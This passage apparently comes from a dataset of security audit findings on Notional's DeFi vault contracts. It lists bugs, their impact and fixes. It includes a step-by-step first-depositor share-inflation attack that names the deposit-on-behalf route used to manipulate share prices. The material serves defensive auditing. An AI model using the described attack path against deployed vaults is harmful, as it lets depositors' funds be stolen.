For example Tether (USDT)'s `approve()` function will revert if the current approval is not zero, to protect against front-running changes of approvals.\\nThe following attempt to call the `approve()` function without setting the allowance to zero first.\\n```\\nFile: TokenUtils.sol\\n function checkApprove(IERC20 token, address spender, uint256 amount) internal {\\n if (address(token) == address(0)) return;\\n\\n IEIP20NonStandard(address(token)).approve(spender, amount);\\n _checkReturnCode();\\n }\\n```\\n\\nHowever, if the token involved is an ERC20 token that does not work when changing the allowance from an existing non-zero allowance value, it will break a number of key functions or features of the protocol as the `TokenUtils.checkApprove` function is utilised extensively within the vault as shown below.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _approveBalancerTokens(TwoTokenPoolContext memory poolContext, address bptSpender) internal {\\n IERC20(poolContext.primaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n IERC20(poolContext.secondaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n // Allow BPT spender to pull BALANCER_POOL_TOKEN\\n IERC20(address(poolContext.basePool.pool)).checkApprove(bptSpender, type(uint256).max);\\n }\\n```\\n\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _approveBalancerTokens(ThreeTokenPoolContext memory poolContext, address bptSpender) internal {\\n poolContext.basePool._approveBalancerTokens(bptSpender);\\n\\n IERC20(poolContext.tertiaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n\\n // For boosted pools, the tokens inside pool context are AaveLinearPool tokens.\\n // So, we need to approve the _underlyingToken (primary borrow currency) for trading.\\n IBoostedPool underlyingPool = IBoostedPool(poolContext.basePool.primaryToken);\\n address primaryUnderlyingAddress = 
BalancerUtils.getTokenAddress(underlyingPool.getMainToken());\\n IERC20(primaryUnderlyingAddress).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n }\\n```\\n\\n```\\nFile: TradingUtils.sol\\n /// @notice Approve exchange to pull from this contract\\n /// @dev approve up to trade.amount for EXACT_IN trades and up to trade.limit\\n /// for EXACT_OUT trades\\n function _approve(Trade memory trade, address spender) private {\\n uint256 allowance = _isExactIn(trade) ? trade.amount : trade.limit;\\n IERC20(trade.sellToken).checkApprove(spender, allowance);\\n }\\n```\\n\\n```\\nFile: StrategyUtils.sol\\n IERC20(buyToken).checkApprove(address(Deployments.WRAPPED_STETH), amountBought);\\n uint256 wrappedAmount = Deployments.WRAPPED_STETH.balanceOf(address(this));\\n /// @notice the amount returned by wrap is not always accurate for some reason\\n Deployments.WRAPPED_STETH.wrap(amountBought);\\n amountBought = Deployments.WRAPPED_STETH.balanceOf(address(this)) - wrappedAmount;\\n```\\n",It is recommended to set the allowance to zero before increasing the allowance and use safeApprove/safeIncreaseAllowance.,A number of features within the vaults will not work if the `approve` function reverts.,"```\\nFile: TokenUtils.sol\\n function checkApprove(IERC20 token, address spender, uint256 amount) internal {\\n if (address(token) == address(0)) return;\\n\\n IEIP20NonStandard(address(token)).approve(spender, amount);\\n _checkReturnCode();\\n }\\n```\\n" +`deleverageAccount` can be used by an address to enter a vault that would otherwise be restricted by the `requireValidAccount` check in `enterVault`,medium,"`deleverageAccount` can be used by an address to enter a vault that would otherwise be restricted by the `requireValidAccount` check in `enterVault`\\nWhen `enterVault` in `VaultAccountAction.sol` is called, the first function that is called is `requireValidAccount`. 
This function checks to ensure that the passed-in `account` parameter is not a system-level `account` address:\\n```\\nrequire(account != Constants.RESERVE); // Reserve address is address(0)\\nrequire(account != address(this));\\n(\\n uint256 isNToken,\\n /* incentiveAnnualEmissionRate */,\\n /* lastInitializedTime */,\\n /* assetArrayLength */,\\n /* parameters */\\n) = nTokenHandler.getNTokenContext(account);\\nrequire(isNToken == 0);\\n```\\n\\nWith the above checks, `requireValidAccount` ensures that any Notional system-level account cannot enter a vault. However, `deleverageAccount` in `VaultAccountAction.sol` allows liquidators to transfer vault shares from a liquidated account into their own account. In the case that a liquidator is not already entered into a vault, then `deleverageAccount` will instantiate a vault account for them (using _transferLiquidatorProfits) before depositing the liquidated account's vault shares into the newly-instantiated account. This effectively circumvents the `requireValidAccount` check in `enterVault`.","Consider updating the `require` statement in `_transferLiquidatorProfits` to the following:\\n```\\nrequire(liquidator.maturity == maturity, ""Vault Shares Mismatch""); // dev: has vault shares\\n```\\n\\nRemoving the option of allowing addresses that do not have a maturity in the respective vault to receive shares and therefore implicitly enter a vault prevents Notional system accounts from being able to enter into vaults.","Any address that would otherwise be restricted from entering vaults via the `requireValidAccount` check would be able to circumvent that function using `deleverageAccount`. 
I assume these system-level accounts are restricted from entering vaults as they have access to internal Notional state and are used across the protocol, so having them be able to enter vaults could negatively impact Notional.\\nAssuming that all the relevant Notional system accounts are smart contracts that do not allow arbitrary calls, then having any of the system accounts themselves trigger this issue is infeasible. However, as a result of another issue it is possible for a vault to force an arbitrary address to deleverage accounts, which could be used to force a Notional system account to enter into a vault.","```\\nrequire(account != Constants.RESERVE); // Reserve address is address(0)\\nrequire(account != address(this));\\n(\\n uint256 isNToken,\\n /* incentiveAnnualEmissionRate */,\\n /* lastInitializedTime */,\\n /* assetArrayLength */,\\n /* parameters */\\n) = nTokenHandler.getNTokenContext(account);\\nrequire(isNToken == 0);\\n```\\n" +No Validation Check Against Decimal Of Secondary Token,medium,"There is no validation check against the decimal of the secondary token due to a typo. Thus, this will cause the vault to be broken entirely or the value of the shares to be stuck if a secondary token with more than 18 decimals is added.\\nThere is a typo in Line 65 within the `TwoTokenPoolMixin` contract. The validation at Line 65 should perform a check against the `secondaryDecimals` instead of the `primaryDecimals`. 
As such, no validation was performed against the secondary token.\\n```\\nFile: TwoTokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n ) PoolMixin(notional_, params) {\\n..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n require(primaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n }\\n```\\n\\nIf the decimal of the secondary tokens is more than 18, the `Stable2TokenOracleMath._getSpotPrice` will stop working as the code will revert in Line 24 below because the decimal of secondary tokens is more than 18.\\nWhen the `Stable2TokenOracleMath._getSpotPrice` function stop working, the vaults will be broken entirely because the settle vault and reinvest rewards functions will stop working too. 
This is because the settle vault and reinvest rewards functions will call the `Stable2TokenOracleMath._getSpotPrice` function internally, resulting in a revert.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n // Prevents overflows, we don't expect tokens to be greater than 18 decimals, don't use\\n // equal sign for minor gas optimization\\n require(poolContext.primaryDecimals < 19); /// @dev primaryDecimals overflow\\n require(poolContext.secondaryDecimals < 19); /// @dev secondaryDecimals overflow\\n require(tokenIndex < 2); /// @dev invalid token index\\n```\\n","Update the code to perform the validation against the `secondaryDecimals` state variable.\\n```\\nconstructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n) PoolMixin(notional_, params) {\\n ..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n// Remove the line below\\n require(primaryDecimals <= 18);\\n// Add the line below\\n require(secondaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n}\\n```\\n","The `Stable2TokenOracleMath._getSpotPrice` will stop working, which will in turn cause the settle vault and reinvest rewards functions to stop working too. Since a vault cannot be settled, the vault is considered broken. 
If the reinvest rewards function cannot work, the value of users' shares will be stuck as the vault relies on reinvesting rewards to buy more BPT tokens from the market.\\nIn addition, there might be some issues when calculating the price of the tokens since the vault assumes that both primary and secondary tokens have a decimal equal to or less than 18 OR some overflow might occur when processing the token value.","```\\nFile: TwoTokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n ) PoolMixin(notional_, params) {\\n..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n require(primaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n }\\n```\\n" +Vault Share/Strategy Token Calculation Can Be Broken By First User/Attacker,medium,"A well-known attack vector for almost all shares-based liquidity pool contracts, where an early user can manipulate the price per share and profit from late users' deposits because of the precision loss caused by the rather large value of price per share.\\nNote: This issue affects MetaStable2 and Boosted3 balancer leverage vaults\\nFor simplicity's sake, we will simplify the `strategy token` minting formula as follows. Also, assume that the 1 `vault share` is equivalent to 1 `strategy token` for this particular strategy vault, therefore, we will use the term `vault share` and `strategy token` interchangeably here.\\n```\\nstrategyToken = (totalBPTHeld == 0) ? 
bptClaim : (bptClaim * totalStrategyToken) / totalBPTHeld\\n```\\n\\nThe vault minting formula is taken from the following:\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts BPT to strategy tokens\\n function _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.totalBPTHeld;\\n }\\n```\\n\\nIf the attacker who is the first depositor claims 1 BPT, he will receive 1 Strategy Token. So 1 BPT per Strategy Token. At this point in time, `totalBPTHeld = 1` and `totalStrategyToken = 1`.\\nThe attacker obtains 9999 BPT can be obtained from the open market. He proceeds to deposit the 9999 BPT into the Aura reward pool on behalf of the vault. At this point in time, `totalBPTHeld = 10000` and `totalStrategyToken = 1`. So 10000 BPT per Strategy Token. Refer to the ""How to increase the total BPT held?"" section below for more details.\\nTwo issues can occur from here.\\nIssue 1 - If bptClaim >= totalBPTHeld\\nThe following describes a scenario in which a user's assets are lost and stolen by an attacker. Assume that Alice deposits/borrow some assets and received 19999 BPT. Based on the formula, Alice will only receive 1 Strategy Token. 
She immediately loses 9999 BPT or half of her assets if she exits the vault or redeems the strategy tokens right after the deposit.\\n```\\nstrategyToken = (bptClaim * totalStrategyToken) / totalBPTHeld\\nstrategyToken = (19999 * 1) / 10000 = 1\\n```\\n\\nIf the attacker exits the vault right after Alice's deposit, the attacker will receive 14999 BPT. He profited 4999 BPT from this attack\\n```\\nbptReceived = (strategyToken * totalBPTHeld) / totalStrategyToken\\nbptReceived = (1 * 29999) / 2 = 14999\\n```\\n\\nIssue 2 - If bptClaim < totalBPTHeld\\nThe following describes a scenario in which a user's assets are lost entirely. Assume that Alice deposits/borrow some assets and received 9999 BPT\\n```\\nstrategyToken = (bptClaim * totalStrategyToken) / totalBPTHeld\\nstrategyToken = (9999 * 1) / 10000 = 0\\n```\\n\\nAs such, she deposited 9999 BPT but did not receive any strategy tokens in return.\\nHow to increase the total BPT held?\\nUnlike the vault design seen in other protocols, Notional's leverage vault does not compute the total BPT held by the vault directly via `BTP.balanceOf(address(vault))`. The vault deposit its BPT to the Aura Reward Pool. 
Therefore, it is not possible to increase the total BPT held by the vault simply by performing a direct BPT token transfer to the vault or Aura Reward Pool in an attempt to increase it.\\nHowever, there is a workaround to increase the total BPT held by the vault, and this can be executed by anyone.\\nThe `totalBPTHeld` within the vault is obtained by calling the `PoolMixin._bptHeld` function.\\n```\\nFile: PoolMixin.sol\\n function _baseStrategyContext() internal view returns(StrategyContext memory) {\\n return StrategyContext({\\n totalBPTHeld: _bptHeld(),\\n settlementPeriodInSeconds: SETTLEMENT_PERIOD_IN_SECONDS,\\n tradingModule: TRADING_MODULE,\\n vaultSettings: BalancerVaultStorage.getStrategyVaultSettings(),\\n vaultState: BalancerVaultStorage.getStrategyVaultState(),\\n feeReceiver: FEE_RECEIVER\\n });\\n }\\n```\\n\\nWithin the `PoolMixin._bptHeld` function, it will call the `AURA_REWARD_POOL.balanceOf(address(this))` to retrieve the number of BPT that the vault has deposited into the Aura Reward Pool.\\n```\\nFile: PoolMixin.sol\\n /// @dev Gets the total BPT held by the aura reward pool\\n function _bptHeld() internal view returns (uint256) {\\n return AURA_REWARD_POOL.balanceOf(address(this));\\n }\\n```\\n\\nThe following is the contract of the AURA_REWARD_POOL taken from the Etherscan. Note that the `AURA_REWARD_POOL.balanceOf` will retrieve the number of BPT tokens held by an account. 
In this example, the account will be the vault's address.\\n```\\nFile: BaseRewardPool4626.sol\\n/**\\n * @dev Returns the amount of tokens owned by `account`.\\n */\\nfunction balanceOf(address account) public view override(BaseRewardPool, IERC20) returns (uint256) {\\n return BaseRewardPool.balanceOf(account);\\n}\\n```\\n\\n```\\nFile: BaseRewardPool.sol\\nfunction balanceOf(address account) public view virtual returns (uint256) {\\n return _balances[account];\\n}\\n```\\n\\nTo increase the balance, the `deposit(uint256 _pid, uint256 _amount, bool _stake)` function of Aura's Booster contract can be called. However, the problem is that this function will deposit to the `msg.sender` and there is no way to spoof the vault's address. Thus, using this function will not work.\\nHowever, there is a second method that can be used to perform a deposit. The `AURA_REWARD_POOL` point to the `BaseRewardPool4626`, thus the reward pool is an ERC4626 vault. The Aura's ERC4626 vault supports an alternative deposit function called `BaseRewardPool4626.deposit` that allows anyone to deposit on behalf of another account. 
An attacker can leverage the `BaseRewardPool4626.deposit` function by specifying the `receiver` parameter to be the `vault.address` in an attempt to increase the total BPT tokens held by the vault.\\n```\\nFile: BaseRewardPool4626.sol\\n/**\\n * @notice Mints `shares` Vault shares to `receiver`.\\n * @dev Because `asset` is not actually what is collected here, first wrap to required token in the booster.\\n */\\nfunction deposit(uint256 assets, address receiver) public virtual override nonReentrant returns (uint256) {\\n // Transfer ""asset"" (crvLP) from sender\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), assets);\\n\\n // Convert crvLP to cvxLP through normal booster deposit process, but don't stake\\n uint256 balBefore = stakingToken.balanceOf(address(this));\\n IDeposit(operator).deposit(pid, assets, false);\\n uint256 balAfter = stakingToken.balanceOf(address(this));\\n\\n require(balAfter.sub(balBefore) >= assets, ""!deposit"");\\n\\n // Perform stake manually, now that the funds have been received\\n _processStake(assets, receiver);\\n\\n emit Deposit(msg.sender, receiver, assets, assets);\\n emit Staked(receiver, assets);\\n return assets;\\n}\\n```\\n\\n```\\nFile: BaseRewardPool.sol \\n/**\\n* @dev Generic internal staking function that basically does 3 things: update rewards based\\n* on previous balance, trigger also on any child contracts, then update balances.\\n* @param _amount Units to add to the users balance\\n* @param _receiver Address of user who will receive the stake\\n*/\\nfunction _processStake(uint256 _amount, address _receiver) internal updateReward(_receiver) {\\n require(_amount > 0, 'RewardPool : Cannot stake 0');\\n\\n //also stake to linked rewards\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).stake(_receiver, _amount);\\n }\\n\\n _totalSupply = _totalSupply.add(_amount);\\n _balances[_receiver] = _balances[_receiver].add(_amount);\\n}\\n```\\n","Consider requiring a minimal amount of 
strategy tokens to be minted for the first minter, and send a portion of the initial mints as a reserve to the Notional Treasury so that the pricePerShare/pricePerStrategyToken can be more resistant to manipulation.\\nReference\\nA similar issue was found in a past Sherlock audit","The attacker can profit from future users' deposits while the late users will lose part of their funds to the attacker. Additionally, it is also possible for users to get no share in return for their deposited funds.",```\\nstrategyToken = (totalBPTHeld == 0) ? bptClaim : (bptClaim * totalStrategyToken) / totalBPTHeld\\n```\\n +UniV2Adapter#getExecutionData doesn't properly handle native ETH swaps,medium,"UniV2Adapter#getExecutionData doesn't properly account for native ETH trades which makes them impossible. Neither method selected supports direct ETH trades, and sender/target are not set correctly for TradingUtils_executeTrade to automatically convert\\n```\\nspender = address(Deployments.UNIV2_ROUTER);\\ntarget = address(Deployments.UNIV2_ROUTER);\\n// msgValue is always zero for uniswap\\n\\nif (\\n tradeType == TradeType.EXACT_IN_SINGLE ||\\n tradeType == TradeType.EXACT_IN_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n} else if (\\n tradeType == TradeType.EXACT_OUT_SINGLE ||\\n tradeType == TradeType.EXACT_OUT_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapTokensForExactTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n}\\n```\\n\\nUniV2Adapter#getExecutionData either returns the swapTokensForExactTokens or swapExactTokensForTokens, neither of which supports native ETH. It also doesn't set spender and target like UniV3Adapter, so _executeTrade won't automatically convert it to a WETH call. 
The result is that all Uniswap V2 calls made with native ETH will fail. Given that Notional operates in native ETH rather than WETH, this is an important feature that currently does not function.","There are two possible solutions:\\nChange the way that target and sender are set to match the implementation in UniV3Adapter\\nModify the return data to return the correct selector for each case (swapExactETHForTokens, swapTokensForExactETH, etc.)\\nGiven that the infrastructure for Uniswap V3 already exists in TradingUtils_executeTrade the first option would be the easiest, and would give the same results considering it's basically the same as what the router is doing internally anyways.",Uniswap V2 calls won't support native ETH,"```\\nspender = address(Deployments.UNIV2_ROUTER);\\ntarget = address(Deployments.UNIV2_ROUTER);\\n// msgValue is always zero for uniswap\\n\\nif (\\n tradeType == TradeType.EXACT_IN_SINGLE ||\\n tradeType == TradeType.EXACT_IN_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n} else if (\\n tradeType == TradeType.EXACT_OUT_SINGLE ||\\n tradeType == TradeType.EXACT_OUT_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapTokensForExactTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n}\\n```\\n" +Deployments.sol uses the wrong address for UNIV2 router which causes all Uniswap V2 calls to fail,medium,"Deployments.sol accidentally uses the Uniswap V3 router address for UNIV2_ROUTER which causes all Uniswap V2 calls to fail\\n```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0xE592427A0AEce92De3Edee1F18E0157C05861564);\\n```\\n\\nThe constant UNIV2_ROUTER contains the address for the Uniswap V3 router, which doesn't contain the ""swapExactTokensForTokens"" or ""swapTokensForExactTokens"" methods. 
As a result, all calls made to Uniswap V2 will revert.",Change UNIV2_ROUTER to the address of the V2 router:\\n```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);\\n```\\n,Uniswap V2 is totally unusable,```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0xE592427A0AEce92De3Edee1F18E0157C05861564);\\n```\\n +stakingContext.auraRewardPool.withdrawAndUnwrap boolean return value not handled in Boosted3TokenPoolUtils.sol and TwoTokenPoolUtils.sol,medium,"stakingContext.auraRewardPool.withdrawAndUnwrap boolean return value not handled in Boosted3TokenPoolUtils.sol and TwoTokenPoolUtils.sol\\nWhen calling function _unstakeAndExitPool,\\nthe contract withdraws BPT tokens back to the vault for redemption\\nby calling\\n```\\nstakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\n```\\n\\nhowever, the underlying call withdrawAndUnwrap returns a boolean value, and the contract does not handle the return value.\\nThe interface of the IAuraRewardPool already indicates that the underlying call returns a value\\n```\\ninterface IAuraRewardPool {\\n function withdrawAndUnwrap(uint256 amount, bool claim) external returns(bool);\\n```\\n\\nand the underlying call with BaseRewardConvexPool.sol also returns the boolean\\n```\\n function withdrawAndUnwrap(uint256 amount, bool claim) public updateReward(msg.sender) returns(bool){\\n```\\n","We recommend the project handle the return value when unstaking explicitly\\n```\\nbool unstaked = stakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\nrequire(unstaked, 'unstake failed');\\n```\\n","Because there are stacks of external call:\\nNotional -> auraRewardPool -> BaseRewardPool,\\nwithout handling the return value explicitly, the transaction may fail silently.","```\\nstakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\n```\\n" +stakingContext.auraBooster.deposit boolean return value not handled in 
Boosted3TokenPoolUtils.sol,medium,"stakingContext.auraBooster.deposit boolean return value not handled in Boosted3TokenPoolUtils.sol\\nthe function _joinPoolAndStake in Boosted3TokenPoolUtils.sol is used extensively when handling the token stake.\\nHowever, when entering the stake and interacting with the external contract, the logic does not handle the returned boolean value in the code below\\n```\\n // Transfer token to Aura protocol for boosted staking\\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n```\\n\\nIn the AuraBooster implementation, a Boolean is indeed returned to acknowledge that the deposit completed successfully.\\n```\\n /**\\n * @notice Deposits an ""_amount"" to a given gauge (specified by _pid), mints a `DepositToken`\\n * and subsequently stakes that on Convex BaseRewardPool\\n */\\n function deposit(uint256 _pid, uint256 _amount, bool _stake) public returns(bool){\\n```\\n","We recommend the project handle the stakingContext.auraBooster.deposit boolean return value explicitly.\\n```\\n // Transfer token to Aura protocol for boosted staking\\n bool staked = stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n require(staked, 'stake failed');\\n```\\n","Notional -> AuraBooster -> BaseRewardPool\\nWithout handling the boolean value explicitly, there is a risk that the transaction may fail silently.\\nBecause there are two layers of external call","```\\n // Transfer token to Aura protocol for boosted staking\\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n```\\n" +`CrossCurrencyfCashVault` Cannot Settle Its Assets In Pieces,medium,"The `CrossCurrencyfCashVault` vault cannot settle its assets in pieces. Thus, it might cause the vault to incur unnecessary slippage.\\nThe settle vault function is designed in a manner where its assets can be settled in pieces. Therefore, the `settleVault` function accepts a `strategyTokens` or `strategyTokensToRedeem` parameter to allow the caller to specify the number of strategy tokens to be settled. 
Therefore, the `settleVault` function accepts a `strategyTokens` or `strategyTokensToRedeem` parameter to allow the caller to specify the number of strategy tokens to be settled.\\nThe reason as mentioned in Notional's walkthrough video (Refer to the explanation at 15.50min mark) is that in some cases the caller might want to break down into multiple transactions due to massive slippage.\\nFor instance, the vault might utilize a 2 day settlement period to allow the vault to settle its assets in pieces so that it can avoid unnecessary transaction costs associated with converting all its assets back to USDC in a single transaction.\\n```\\nFile: CrossCurrencyfCashVault.sol\\n /**\\n * @notice During settlement all of the fCash balance in the lend currency will be redeemed to the\\n * underlying token and traded back to the borrow currency. All of the borrow currency will be deposited\\n * into the Notional contract as asset tokens and held for accounts to withdraw. Settlement can only\\n * be called after maturity.\\n * @param maturity the maturity to settle\\n * @param settlementTrade details for the settlement trade\\n */\\n function settleVault(uint256 maturity, uint256 strategyTokens, bytes calldata settlementTrade) external {\\n require(maturity <= block.timestamp, ""Cannot Settle"");\\n VaultState memory vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n require(vaultState.isSettled == false);\\n require(vaultState.totalStrategyTokens >= strategyTokens);\\n\\n RedeemParams memory params = abi.decode(settlementTrade, (RedeemParams));\\n \\n // The only way for underlying value to be negative would be if the vault has somehow ended up with a borrowing\\n // position in the lend underlying currency. 
This is explicitly prevented during redemption.\\n uint256 underlyingValue = convertStrategyToUnderlying(\\n address(0), vaultState.totalStrategyTokens, maturity\\n ).toUint();\\n\\n // Authenticate the minimum purchase amount, all tokens will be sold given this slippage limit.\\n uint256 minAllowedPurchaseAmount = (underlyingValue * settlementSlippageLimit) / SETTLEMENT_SLIPPAGE_PRECISION;\\n require(params.minPurchaseAmount >= minAllowedPurchaseAmount, ""Purchase Limit"");\\n\\n NOTIONAL.redeemStrategyTokensToCash(maturity, strategyTokens, settlementTrade);\\n\\n // If there are no more strategy tokens left, then mark the vault as settled\\n vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n if (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n }\\n }\\n```\\n\\nDuring vault settlement, the `CrossCurrencyfCashVault._redeemFromNotional` function will be called, and the code in lines 252-262 will be executed. However, it was observed that the `strategyTokens` parameter is ignored, and the vault will forcefully settle all the strategy tokens in one go. 
As such, there is no way for the caller to break down the settle vault transaction into multiple transactions.\\n```\\nFile: CrossCurrencyfCashVault.sol\\n function _redeemFromNotional(\\n address account,\\n uint256 strategyTokens,\\n uint256 maturity,\\n bytes calldata data\\n ) internal override returns (uint256 borrowedCurrencyAmount) {\\n uint256 balanceBefore = LEND_UNDERLYING_TOKEN.balanceOf(address(this));\\n RedeemParams memory params = abi.decode(data, (RedeemParams));\\n\\n if (maturity <= block.timestamp) {\\n // Only allow the vault to redeem past maturity to settle all positions\\n require(account == address(this));\\n NOTIONAL.settleAccount(address(this));\\n (int256 cashBalance, /* */, /* */) = NOTIONAL.getAccountBalance(LEND_CURRENCY_ID, address(this));\\n\\n // It should never be possible that this contract has a negative cash balance\\n require(0 <= cashBalance && cashBalance <= int256(uint256(type(uint88).max)));\\n\\n // Withdraws all cash to underlying\\n NOTIONAL.withdraw(LEND_CURRENCY_ID, uint88(uint256(cashBalance)), true);\\n } else {\\n // Sells fCash on Notional AMM (via borrowing)\\n BalanceActionWithTrades[] memory action = _encodeBorrowTrade(\\n maturity,\\n strategyTokens,\\n params.maxBorrowRate\\n );\\n NOTIONAL.batchBalanceAndTradeAction(address(this), action);\\n\\n // Check that we have not somehow borrowed into a negative fCash position, vault borrows\\n // are not included in account context\\n AccountContext memory accountContext = NOTIONAL.getAccountContext(address(this));\\n require(accountContext.hasDebt == 0x00);\\n }\\n\\n uint256 balanceAfter = LEND_UNDERLYING_TOKEN.balanceOf(address(this));\\n \\n // Trade back to borrow currency for repayment\\n Trade memory trade = Trade({\\n tradeType: TradeType.EXACT_IN_SINGLE,\\n sellToken: address(LEND_UNDERLYING_TOKEN),\\n buyToken: address(_underlyingToken()),\\n amount: balanceAfter - balanceBefore,\\n limit: params.minPurchaseAmount,\\n deadline: block.timestamp,\\n 
exchangeData: params.exchangeData\\n });\\n\\n (/* */, borrowedCurrencyAmount) = _executeTrade(params.dexId, trade);\\n }\\n```\\n",It is recommended to update the `CrossCurrencyfCashVault._redeemFromNotional` function to allow the vault to be settled in multiple transactions.,The vault might incur unnecessary slippage during settlement as the settlement cannot be broken into multiple transactions.,"```\\nFile: CrossCurrencyfCashVault.sol\\n /**\\n * @notice During settlement all of the fCash balance in the lend currency will be redeemed to the\\n * underlying token and traded back to the borrow currency. All of the borrow currency will be deposited\\n * into the Notional contract as asset tokens and held for accounts to withdraw. Settlement can only\\n * be called after maturity.\\n * @param maturity the maturity to settle\\n * @param settlementTrade details for the settlement trade\\n */\\n function settleVault(uint256 maturity, uint256 strategyTokens, bytes calldata settlementTrade) external {\\n require(maturity <= block.timestamp, ""Cannot Settle"");\\n VaultState memory vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n require(vaultState.isSettled == false);\\n require(vaultState.totalStrategyTokens >= strategyTokens);\\n\\n RedeemParams memory params = abi.decode(settlementTrade, (RedeemParams));\\n \\n // The only way for underlying value to be negative would be if the vault has somehow ended up with a borrowing\\n // position in the lend underlying currency. 
This is explicitly prevented during redemption.\\n uint256 underlyingValue = convertStrategyToUnderlying(\\n address(0), vaultState.totalStrategyTokens, maturity\\n ).toUint();\\n\\n // Authenticate the minimum purchase amount, all tokens will be sold given this slippage limit.\\n uint256 minAllowedPurchaseAmount = (underlyingValue * settlementSlippageLimit) / SETTLEMENT_SLIPPAGE_PRECISION;\\n require(params.minPurchaseAmount >= minAllowedPurchaseAmount, ""Purchase Limit"");\\n\\n NOTIONAL.redeemStrategyTokensToCash(maturity, strategyTokens, settlementTrade);\\n\\n // If there are no more strategy tokens left, then mark the vault as settled\\n vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n if (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n }\\n }\\n```\\n" +`CrossCurrencyfCashVault` Cannot Be Upgraded,medium,"`CrossCurrencyfCashVault` cannot be upgraded as it is missing the authorize upgrade method.\\nThe Cross Currency Vault is expected to be upgradeable as:\\nThis vault is similar to the other vaults (Boosted3TokenAuraVault and MetaStable2TokenAuraVault) provided by Notional that are upgradeable by default.\\nThe `BaseStrategyVault` has configured the storage gaps `uint256[45] private __gap` for upgrading purposes\\nClarified with the sponsor and noted that Cross Currency Vault should be upgradeable\\n`CrossCurrencyfCashVault` inherits from `BaseStrategyVault`. However, the `BaseStrategyVault` forget to inherit Openzepplin's `UUPSUpgradeable` contract. 
